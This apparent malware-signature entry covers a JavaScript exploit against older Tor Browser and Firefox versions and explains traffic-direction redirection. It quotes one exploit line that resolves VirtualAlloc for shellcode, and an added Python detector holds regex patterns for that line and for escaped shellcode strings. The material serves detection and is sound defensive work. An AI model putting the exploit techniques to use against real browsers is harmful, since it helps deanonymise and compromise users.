
Malware entry: malware.tor_ff_exploit

Description: Detected malicious JavaScript code that targets Tor users running versions of Tor Browser and Firefox from before November 2016.

Hackers usually point injected scripts and iframes at intermediary Traffic Direction Services (TDS servers) instead of at the real sites that serve the malicious payload. This scheme adds flexibility to the attack: the additional layer can detect the OS, browser, referrer, country, IP address and other features of each visitor and redirect each category to the landing page built for exactly that type of visitor. TDSs usually work as aggregators, buying traffic from hackers who compromise websites and selling it to criminal groups interested in a particular type of traffic.

The exploit code usually contains lines like these:

... f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc"); ...
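The two traits visible in that fragment, the Windows API-resolution helpers and a string literal made entirely of \uXXXX escapes that decodes to machine code rather than text, are what a scanner can key on. The following detector is an added example written for this entry, not Sucuri's signature engine; the regex markers are taken from the quoted fragment, and the sample scripts (including the short repeated escape string standing in for the real payload) are constructed:

```python
import re

# Constructed sample inputs (not from the entry): one benign script and one
# carrying the markers described above, with a short made-up escape string
# standing in for the long shellcode literal.
BENIGN_JS = 'var greeting = "\\u00e9t\\u00e9"; document.title = greeting;'
SUSPECT_JS = (
    'f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");'
    'var thecode=\'' + '\\ue8fc\\u0089\\u0000\\u8960\\u31e5' * 20 + '\';'
)

# Markers taken from the exploit fragment quoted in the entry.
API_MARKERS = [
    re.compile(r'findPopRet\s*\(\s*["\']E[A-Z]{2}["\']\s*\)'),
    re.compile(r'resolve_imported_function\s*\(\s*["\']kernel32\.dll["\']\s*,\s*["\']VirtualAlloc["\']\s*\)'),
]
# A JS string literal consisting of 32 or more consecutive \uXXXX escapes.
ESCAPED_STRING = re.compile(r'["\']((?:\\u[0-9a-fA-F]{4}){32,})["\']')

def escapes_to_bytes(literal: str) -> bytes:
    """Decode a run of \\uXXXX escapes the way memory sees them: on x86 each
    UTF-16 code unit is stored little-endian, so \\ue8fc becomes bytes fc e8."""
    units = re.findall(r'\\u([0-9a-fA-F]{4})', literal)
    return b''.join(int(u, 16).to_bytes(2, 'little') for u in units)

def scan_js(source: str) -> dict:
    """Return the indicators found in one script. Detection only: nothing here
    executes or interprets the script."""
    hits = [m.pattern for m in API_MARKERS if m.search(source)]
    blobs = [escapes_to_bytes(m.group(1)) for m in ESCAPED_STRING.finditer(source)]
    # Ordinary text encoded this way decodes mostly to printable ASCII;
    # machine code does not, so a low printable ratio marks an opaque payload.
    opaque = [b for b in blobs if sum(32 <= c < 127 for c in b) / len(b) < 0.5]
    return {
        "api_markers": len(hits),
        "escaped_blobs": len(blobs),
        "opaque_blobs": len(opaque),
        "suspicious": bool(hits) or bool(opaque),
    }

if __name__ == "__main__":
    for name, js in (("benign", BENIGN_JS), ("suspect", SUSPECT_JS)):
        print(name, scan_js(js))
```

Either indicator alone is worth flagging: the escape-string check catches the payload even when the loader code is renamed, and the API markers catch the loader even when the payload is fetched separately.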



Affecting: any website (most likely to be found on .onion sites).

For more information, see:
Firefox Zero-Day Exploit to Unmask Tor Users Released Online
[tor-talk] Javascript exploit


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb